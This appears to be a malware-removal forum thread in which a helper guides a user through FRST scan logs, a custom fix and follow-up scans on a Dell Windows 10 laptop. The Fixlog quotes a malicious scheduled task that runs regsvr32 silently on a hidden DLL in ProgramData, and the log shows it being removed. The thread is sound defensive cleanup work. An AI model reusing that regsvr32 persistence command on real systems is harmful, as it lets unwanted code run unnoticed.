Task: {656E6231-99E5-4619-A457-F81BCE2B5001} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-06-18] ()
Task: {6AC75941-90E1-4B12-B60D-07275B79FFBF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-21] (Google Inc.)
Task: {6C1259C2-2732-4064-AFED-12D37A57A748} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-11-06] (Realtek Semiconductor)
Task: {9CC45A00-BF9D-4979-85EF-BD352F13344D} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-09-21] ()
Task: {9E435D2B-0128-4FE8-BC3B-2CFA9A053A3C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-21] (Google Inc.)
Task: {A502BE85-AC38-4E76-B89C-129E4250C937} - System32\Tasks\Dell SupportAssistAgent AnonymousRegistration => C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssist.exe [2017-06-28] (Dell Inc.)
Task: {E0156F32-2369-4C0C-80EC-47794CC43783} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-06-18] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\RunDLC.job => cmd /c sc start Dell Help Support WORKGROUP DESKTOP 47E6V0K

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2017-03-18 16:58 - 2017-03-18 16:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-04-12 16:53 - 2017-06-18 07:58 - 08931008 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2017-03-18 16:59 - 2017-03-18 22:31 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-12-21 11:24 - 2016-12-21 11:24 - 00134008 _____ () C:\Program Files (x86)\Dell Customer Connect\ServiceTagPlusPlus.dll
2015-06-23 19:26 - 2015-06-23 19:26 - 00155888 _____ () c:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-30 03:24 - 2017-06-22 16:06 - 00002024 _____ C:\WINDOWS\system32\Drivers\etc\hosts

0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 api.recommendedsw.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com
0.0.0.0 cdn.appround.biz
0.0.0.0 cdn.bigspeedpro.com
0.0.0.0 cdn.bispd.com

There are 4 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.100.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "WavesSvc"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{816D282F-5F25-4232-8B8A-F198C2A77AFD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{1B194384-4C82-4FF1-AB0B-6E290C9A4CD2}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

10-06-2017 07:35:35 Windows Update
18-06-2017 08:37:23 Windows Update
22-06-2017 22:52:29 Windows Update
03-07-2017 21:26:50 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/03/2017 09:08:00 PM) (Source: Dell System Detect) (EventID: 0) (User: )
Description: <Exception><Type>System.Xml.XmlException</Type><Message><![CDATA[The '/' character, hexadecimal value 0x2F, cannot be included in a name.]]></Message><Source><![CDATA[System.Xml]]></Source><StackTrace><![CDATA[ at System.Xml.XmlDocument.CheckName(String name)
at System.Xml.XmlElement..ctor(XmlName name, Boolean empty, XmlDocument doc)
at System.Xml.XmlDocument.CreateElement(String prefix, String localName, String namespaceURI)
at System.Xml.XmlDocument.CreateElement(String name)
at eSupport.Common.Client.Core.LastUpdatedHelper.SetLastUpdatedValue(String type, String value)]]></StackTrace><SysInfo STag="8L8BD82" SMBIOSMajVer="2" SMBIOSMinVer="8" SMBIOSBIOSVer="4.0.13" SMBIOSPresent="True" Rel_Date="20161222000000.000000+000" DSDVersion="" Vendor="Dell Inc." PName="Inspiron 15-3552" Ident_Num="DESKTOP-47E6V0K" TimeZone="(UTC-05:00) Eastern Time (US & Canada)" OSName="Microsoft Windows 10 Home"/><Method>UpdateLastUpdatedConfig</Method><HostIP>192.168.100.132</HostIP></Exception>

Error: (07/03/2017 09:07:59 PM) (Source: Dell System Detect) (EventID: 0) (User: )
Description: <Exception><Type>System.Xml.XmlException</Type><Message><![CDATA[The '/' character, hexadecimal value 0x2F, cannot be included in a name.]]></Message><Source><![CDATA[System.Xml]]></Source><StackTrace><![CDATA[ at System.Xml.XmlDocument.CheckName(String name)
at System.Xml.XmlElement..ctor(XmlName name, Boolean empty, XmlDocument doc)
at System.Xml.XmlDocument.CreateElement(String prefix, String localName, String namespaceURI)
at System.Xml.XmlDocument.CreateElement(String name)
at eSupport.Common.Client.Core.LastUpdatedHelper.SetLastUpdatedValue(String type, String value)]]></StackTrace><SysInfo STag="8L8BD82" SMBIOSMajVer="2" SMBIOSMinVer="8" SMBIOSBIOSVer="4.0.13" SMBIOSPresent="True" Rel_Date="20161222000000.000000+000" DSDVersion="" Vendor="Dell Inc." PName="Inspiron 15-3552" Ident_Num="DESKTOP-47E6V0K" TimeZone="(UTC-05:00) Eastern Time (US & Canada)" OSName="Microsoft Windows 10 Home"/><Method>UpdateLastUpdatedConfig</Method><HostIP>192.168.100.132</HostIP></Exception>

Error: (07/03/2017 07:41:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DDVDataCollector.exe, version: 5.2.1.55, time stamp: 0x59497602
Faulting module name: ntdll.dll, version: 10.0.15063.0, time stamp: 0xb79b6ddb
Exception code: 0xc0000374
Fault offset: 0x00000000000f775f
Faulting process id: 0x544
Faulting application start time: 0x01d2f44edb134aa0
Faulting application path: C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: de1f7807-c64c-4ca8-96b3-695b45c76c16
Faulting package full name:
Faulting package-relative application ID:

Error: (06/24/2017 07:10:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MicrosoftEdgeCP.exe, version: 11.0.15063.332, time stamp: 0x591fd994
Faulting module name: OLEAUT32.dll, version: 10.0.15063.332, time stamp: 0xc76efb2b
Exception code: 0xcfffffff
Fault offset: 0x000000000000cf59
Faulting process id: 0x2ab4
Faulting application start time: 0x01d2ed3e9dcc934d
Faulting application path: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Faulting module path: C:\WINDOWS\System32\OLEAUT32.dll
Report Id: 0c3a3b9d-c63c-4a31-902b-7ac3e888eac1
Faulting package full name: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Faulting package-relative application ID: ContentProcess

Error: (06/24/2017 07:06:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MicrosoftEdgeCP.exe, version: 11.0.15063.332, time stamp: 0x591fd994
Faulting module name: ntdll.dll, version: 10.0.15063.0, time stamp: 0xb79b6ddb
Exception code: 0xcfffffff
Fault offset: 0x0000000000096392
Faulting process id: 0x3b0
Faulting application start time: 0x01d2ed3da1cc89af
Faulting application path: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 01197c29-d668-4eef-b749-25e831477bb0
Faulting package full name: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Faulting package-relative application ID: ContentProcess

Error: (06/24/2017 06:57:59 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-47E6V0K)
Description: Package Microsoft.Windows.ShellExperienceHost_10.0.15063.332_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

Error: (06/23/2017 09:12:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-47E6V0K)
Description: Package Microsoft.Windows.ShellExperienceHost_10.0.15063.332_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

Error: (06/22/2017 09:12:38 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 512) (User: )
Description: The Cryptographic Services service failed to initialize the VSS backup "System Writer" object.

Details:
Could not query the status of the EventSystem service.

System Error:
A system shutdown is in progress.
.

Error: (06/22/2017 05:42:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mbam.exe version 2.3.173.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: f8c

Start Time: 01d2eba046375e2a

Termination Time: 38

Application Path: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Report Id: 311fae0a-81ef-4726-a66f-b8ae1d76204b

Faulting package full name:

Faulting package-relative application ID:

Error: (06/22/2017 05:22:43 PM) (Source: DellUpService.exe) (EventID: 0) (User: )
Description: [5] ERROR- Exception on mounting SOS: mk_dellsupport_lnk can't find DSP! errno=0 #StackInfo#


System errors:
=============
Error: (07/03/2017 09:27:41 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Security Assist service terminated unexpectedly. It has done this 1 time(s).

Error: (07/03/2017 08:55:31 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (07/03/2017 08:55:31 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (07/03/2017 08:54:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error:
The request is not supported.

Error: (07/03/2017 08:52:48 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
An instance of the service is already running.

Error: (07/03/2017 08:52:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Modules Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.

Error: (07/03/2017 08:52:21 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Data Vault Service API service terminated unexpectedly. It has done this 1 time(s).

Error: (07/03/2017 08:52:21 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Data Vault Processor service terminated unexpectedly. It has done this 1 time(s).

Error: (07/03/2017 08:52:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Security Assist service terminated unexpectedly. It has done this 1 time(s).

Error: (07/03/2017 08:52:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The jhi_service service terminated unexpectedly. It has done this 1 time(s).


==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU N3050 @ 1.60GHz
Percentage of memory in use: 47%
Total physical RAM: 4007.65 MB
Available physical RAM: 2103.18 MB
Total Virtual: 8103.65 MB
Available Virtual: 5979.4 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:455.06 GB) (Free:411.85 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 258D9519)

Partition: GPT.

==================== End of Addition.txt ============================

 

[RichH]

Happy Independence Day Bump.

Am I all clear?
Thanks

 

[Broni]

Good news

Sorry for the delay. It looks like email notification missed me.

Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

[RichH]

aFix result of Farbar Recovery Scan Tool (x64) Version: 05-07-2017
Ran by Herbert Holland (06-07-2017 22:34:29) Run:1
Running from C:\Users\Herbert Holland\Desktop
Loaded Profiles: Herbert Holland (Available Profiles: Herbert Holland)
Boot Mode: Normal
==============================================

fixlist content:
*****************
GroupPolicy: Restriction <==== ATTENTION
2017-06-06 20:29 - 2017-06-06 20:29 - 0000044 _____ () C:\Users\Herbert Holland\AppData\Roaming\WB.CFG
2017-06-09 21:41 - 2017-06-09 21:41 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2017-07-03 17:55 - 2017-03-18 16:57 - 1930320 _____ (Microsoft Corporation) C:\Users\Herbert Holland\AppData\Local\Temp\dllnt_dump.dll
2017-06-22 16:22 - 2017-06-22 16:23 - 7178424 _____ (VS Revo Group ) C:\Users\Herbert Holland\AppData\Local\Temp\VSUSetup.exe
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {6458FECC-36A5-4AEA-BE85-AB6581097D9F} - System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\e26b0e7f\ffe3a8c0.dll" <==== ATTENTION
C:\PROGRA~3\e26b0e7f

*****************

C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\Users\Herbert Holland\AppData\Roaming\WB.CFG => moved successfully
C:\ProgramData\DP45977C.lfl => moved successfully
C:\Users\Herbert Holland\AppData\Local\Temp\dllnt_dump.dll => moved successfully
C:\Users\Herbert Holland\AppData\Local\Temp\VSUSetup.exe => moved successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => key removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6458FECC-36A5-4AEA-BE85-AB6581097D9F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6458FECC-36A5-4AEA-BE85-AB6581097D9F} => key removed successfully
C:\WINDOWS\System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A0D2D779-C325-C9CD-794C-617EE523AB5C} => key removed successfully
"C:\PROGRA~3\e26b0e7f" => not found.


The system needed a reboot.

==== End of Fixlog 22:34:48 ====

 

[Broni]

Last scans....

Download Security Check from here or here and save it to your Desktop.

• Double-click SecurityCheck.exe
• Follow the onscreen instructions inside of the black box.
• A Notepad document should open automatically called checkup.txt; please post the contents of that document.

NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:

• Internet Services
• Windows Firewall
• System Restore
• Security Center
• Windows Update
• Windows Defender
• Other Services

Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Download Temp File Cleaner (TFC)
Alternate download: http://www.itxassociates.com/OT-Tools/TFC.exe

• Double click on TFC.exe to run the program.
• Click on Start button to begin cleaning process.
• TFC will close all running programs, and it may ask you to restart computer.

Download Sophos Free Virus Removal Tool and save it to your desktop.

• Double click the icon and select Run
• Click Next
• Select I accept the terms in this license agreement, then click Next twice
• Click Install
• Click Finish to launch the program
• Once the virus database has been updated click Start Scanning
• If any threats are found click Details, then View log file... (bottom left hand corner)
• Copy and paste the results in your reply
• Close the Notepad document, close the Threat Details screen, then click Start cleanup
• Click Exit to close the program

 

[RichH]

Results of screen317's Security Check version 0.99.93
x64 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Defender
[size=1]WMI entry may not exist for antivirus; attempting automatic update.[/size]
`````````Anti-malware/Other Utilities Check:`````````
Google Chrome (59.0.3071.115)
Google Chrome (SetupMetrics...)
````````Process Check: objlist.exe by Laurent````````
Windows Defender MSMpEng.exe
Windows Defender MSASCuiL.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: %
````````````````````End of Log``````````````````````

 

[RichH]

Farbar Service Scanner Version: 27-01-2016
Ran by Herbert Holland (administrator) on 06-07-2017 at 23:19:02
Running from "C:\Users\Herbert Holland\Desktop"
Microsoft Windows 10 Home (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Policy:
========================


Security Center:
============


Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.


Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============

Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****

 

[RichH]

TFC deleted 1.4GB of temp files.

Sophos found no threats.